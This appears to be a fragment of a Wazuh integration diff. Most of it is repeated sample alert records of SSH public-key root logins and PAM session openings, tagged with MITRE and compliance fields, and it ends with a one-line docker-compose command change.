SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote 
Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} -{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} -{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial 
Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 
16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} -{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA 
SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} -{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by 
(uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} -{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication 
success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} -{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 
16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote 
Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} -{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} -{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial 
Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 
16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} -{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA 
SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} -{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by 
(uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} 
diff --git a/integrations/docker/amazon-security-lake.yml b/integrations/docker/amazon-security-lake.yml
index 72b647d37a72a..bb92e7c04d07c 100644
--- a/integrations/docker/amazon-security-lake.yml
+++ b/integrations/docker/amazon-security-lake.yml
@@ -10,7 +10,7 @@ services:
 depends_on:
 wazuh.indexer:
 condition: service_healthy
- command: bash -c "python run.py -a wazuh.indexer -t1"
+ command: bash -c "python run.py -a wazuh.indexer"
 wazuh.indexer:
 image: opensearchproject/opensearch:2.11.1